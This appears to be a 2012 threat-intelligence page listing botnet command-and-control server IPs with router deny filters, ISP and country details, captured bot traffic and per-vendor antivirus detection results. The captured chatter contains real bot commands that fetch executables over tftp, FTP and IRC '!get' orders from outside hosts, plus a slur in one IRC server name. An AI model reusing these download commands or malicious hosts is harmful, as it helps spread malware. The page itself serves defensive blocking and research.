home |

Download our list of the most observed botnet command and control server IP addresses.

Most Prolific BotNet Command and Control Servers and Filters

Wed Feb 22 08:41:10 2012

10 Day Filter Set 30 Day Filter Set

Priority 100	TCP Ports 80	Filter deny ip host 213.155.14.161 any log ! 294 infects 01/04/12 to 02/21/12 -	ISP ossadchy - osadchiy yuriy
Clients 294	ukraine	Activity	Domain -

Chatter Example

Client: GET /x.exe HTTP/1.0User-Agent: Mozilla/4.0Host: 95.75.158.158:2384
Server: GET /index.php?id=vswzrfxuxmxd&scn=4&inf=0&ver=19&cnt=USA...

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 32	TCP Ports 65520	Filter deny ip host 83.133.119.197 any log ! 31 infects 01/06/12 to 02/20/12 greatnet.de	ISP lncde-greatnet-newmedia
Clients 31	germany	Activity	Domain greatnet.de

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 110.12.70.106 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 110.12.70.106 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK qhfheepvUSER r020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG qhfheepv :!get http:/91.202.244.57/pac.txt:u. PRIVMSG...
Client: GET /pac.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /temp/PreLoader_59fast.exe HTTP/1.0User-Agent: DownloadHost:...
Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
Server: PONG :j.
Client: JOIN &virtu

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Gen_Heur.FKP.1
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Gen_Heur.FKP.1
Ikarus	Trojan-Downloader.Cutwail
Kaspersky	HEUR_Generic
McAfee	MISSED
Microsoft	TrojanDownloader_Cutwail.BF
NOD32v2	MISSED
Norman	MISSED
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalEncPk-AAY
Sunbelt	MISSED
Symantec	Zbot
TheHacker	Posible_Worm32
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 5	TCP Ports 65520	Filter deny ip host 94.63.149.150 any log ! 5 infects 01/06/12 to 01/09/12 ipv4ilink.net	ISP evolva telecom s.r.l
Clients 5	romania	Activity	Domain ipv4ilink.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 1.250.41.32 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 1.250.41.32 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK qledpdksUSER c020501 . . :_
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu
Server: PONG :k.
Client: JOIN &virtu

BotClient Antivirus Diagnoses

AhnLab-V3	Virut
AntiVir	Virut.A
Authentium	Virut.4960
Avast	_Virut-B
AVG	Virut.A
BitDefender	Virtob.6.Gen
CAT-QuickHeal	Virut.A
ClamAV	Virut.A
DrWeb	Virut
eSafe	Virut.a
eTrust-Vet	Virut.5127
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.A
F-Prot	Virut.4960
F-Secure	Virut.a
Ikarus	Virut.a
Kaspersky	Virut.a
McAfee	Virut.a
Microsoft	Virut.A
NOD32v2	Virut.5127
Norman	Virut.A
Panda	Virutas.B
Prevx1	MISSED
Rising	Virut.a
Sophos	Virut-T
Sunbelt	MISSED
Symantec	Virut.A
TheHacker	Virut.gen
TrendMicro	PE_VIRUT.A
VBA32	Virut.A
VirusBuster	Virut.Gen.4
Webwasher Gateway	Virut.A

Priority 4	TCP Ports 6900	Filter deny ip host 190.96.181.218 any log ! 4 infects 01/18/12 to 01/18/12 -	ISP telebucaramanga s.a. e.s.p
Clients 4	colombia	Activity	Domain -

Chatter Example

Client: USER 1
Server: 331 Password required
Client: PASS 1
Server: 230 User logged in.
Server: RETR agl23.exe
Server: 150 Opening BINARY mode data connection
Server: 221 Goodbye happy r00ting.
Client: NICK USA|32543USER vlskn 0 0 :USA|32543
Server: :fucken.niggerz NOTICE USA|32543 :*** If you are having problems...
Server: PONG :F3D4BA8
Client: JOIN ##TZ getsome
Client: USERHOST USA|32543
Client: MODE USA|32543 -x+iJOIN ##TZ getsomeUSERHOST USA|32543MODE...
Server: PONG :fucken.niggerz
Server: PONG :fucken.niggerz
Server: PING :fucken.niggerz:retry!email@fucken.niggerz QUIT :Quit:...
Server: PONG :fucken.niggerz

BotClient Antivirus Diagnoses

AhnLab-V3	DropperVB
AntiVir	TRJorik.lcbta
Authentium	MISSED
Avast	MISSED
AVG	Generic26.BSSV
BitDefender	Gen_Variant.Graftor.12997
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MulDrop3.27505
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	VBInjector.W!tr
F-Prot	MISSED
F-Secure	Gen_Variant.Graftor.12997
Ikarus	Jorik
Kaspersky	Jorik.Llac.cbt
McAfee	MISSED
Microsoft	Ircbrute
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	Gen
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 65520 91	Filter deny ip host 94.63.147.131 any log ! 1 infects 02/06/12 to 02/06/12 ipv4ilink.net	ISP evolva telecom s.r.l
Clients 1	romania	Activity	Domain ipv4ilink.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 110.14.197.56 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 110.14.197.56 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK xfpqzeilUSER p020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG xfpqzeil :!get http:/ghyt54.com/pac33.txt:u. PRIVMSG...
Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
Server: PONG :k.
Client: JOIN &virtu
Server: NICK qpuobuffUSER q020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG qpuobuff :!get http:/largokal.net/ex.exe:u. PRIVMSG...
Server: GET /ex.exe HTTP/1.0User-Agent: DownloadHost: largokal.netPragma:...
Server: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...
Client: POST /forum/be08676aa6521d6d8c60ea587a8e144a.php HTTP/1.0Host:...

BotClient Antivirus Diagnoses

AhnLab-V3	Welchia.10240
AntiVir	Nachi.A.1
Authentium	MISSED
Avast	_Virut
AVG	Nachi.A
BitDefender	Generic.22648
CAT-QuickHeal	MISSED
ClamAV	Virut.ca
DrWeb	Virut.5
eSafe	Virut.gen
eTrust-Vet	Virut.9276
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	Virut.fam
F-Prot	Virut.9264
F-Secure	Generic.22648
Ikarus	Virut
Kaspersky	Welchia.s
McAfee	Nachi.a
Microsoft	Virut.AK
NOD32v2	MISSED
Norman	Virut.D2
Panda	Virutas.gen
Prevx1	MISSED
Rising	Virut.du
Sophos	Vetor-A
Sunbelt	MISSED
Symantec	Virut.B
TheHacker	Virut.gen2
TrendMicro	PE_VIRUT.D-4
VBA32	Virut.3
VirusBuster	Virut.Gen
Webwasher Gateway	MISSED

Priority 1	TCP Ports 65520	Filter deny ip host 91.226.212.159 any log ! 1 infects 02/07/12 to 02/07/12 nacksystem.net	ISP eu-zz
Clients 1	united kingdom	Activity	Domain nacksystem.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 1.247.138.126 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 1.247.138.126 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK uyhvnrnqUSER f020500 . . :_
Client: Service Pack 2JOIN &virtu
Server: :u. PRIVMSG uyhvnrnq :!get http:/188.247.135.95/555.exe:u...
Client: GET /pac33.txt HTTP/1.0User-Agent: DownloadHost:...
Server: GET /temp/fast.exe HTTP/1.0User-Agent: DownloadHost:...
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	Gen_Heur.FKP.1
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	Gen_Heur.FKP.1
Ikarus	Trojan-Downloader.Cutwail
Kaspersky	HEUR_Generic
McAfee	MISSED
Microsoft	TrojanDownloader_Cutwail.BF
NOD32v2	MISSED
Norman	MISSED
Panda	TrjCI.A
Prevx1	MISSED
Rising	MISSED
Sophos	MalEncPk-AAY
Sunbelt	MISSED
Symantec	Zbot
TheHacker	Posible_Worm32
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 65520	Filter deny ip host 91.226.212.164 any log ! 1 infects 02/12/12 to 02/12/12 nacksystem.net	ISP eu-zz
Clients 1	united kingdom	Activity	Domain nacksystem.net

Chatter Example

Client: dir dllcache\\tftpd.exe
Client: tftp -i 70.184.126.54 get svchost.exe wins\\SVCHOST.EXE
Client: tftp -i 70.184.126.54 get dllhost.exe wins\\DLLHOST.EXE
Client: NICK tfkvqfcwUSER d020501 . . :-
Client: JOIN &virtu
Server: :u. PRIVMSG tfkvqfcw :!get...
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu
Server: PONG :l.
Client: JOIN &virtu

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED

Priority 1	TCP Ports 65520	Filter deny ip host 114.112.255.81 any log ! 1 infects 02/20/12 to 02/20/12 -	ISP 22d no.1 building
Clients 1	china	Activity	Domain -

Chatter Example

Client: NICK kbjoodqoUSER s020500 . . :-
Client: Service Pack 2JOIN &virtu
Server: :u. PRIVMSG kbjoodqo :!get http:/ghyt54.com/pac33.txt:u. PRIVMSG...

BotClient Antivirus Diagnoses

AhnLab-V3	MISSED
AntiVir	MISSED
Authentium	MISSED
Avast	MISSED
AVG	MISSED
BitDefender	MISSED
CAT-QuickHeal	MISSED
ClamAV	MISSED
DrWeb	MISSED
eSafe	MISSED
eTrust-Vet	MISSED
Ewido	MISSED
FileAdvisor	MISSED
Fortinet	MISSED
F-Prot	MISSED
F-Secure	MISSED
Ikarus	MISSED
Kaspersky	MISSED
McAfee	MISSED
Microsoft	MISSED
NOD32v2	MISSED
Norman	MISSED
Panda	MISSED
Prevx1	MISSED
Rising	MISSED
Sophos	MISSED
Sunbelt	MISSED
Symantec	MISSED
TheHacker	MISSED
TrendMicro	MISSED
VBA32	MISSED
VirusBuster	MISSED
Webwasher Gateway	MISSED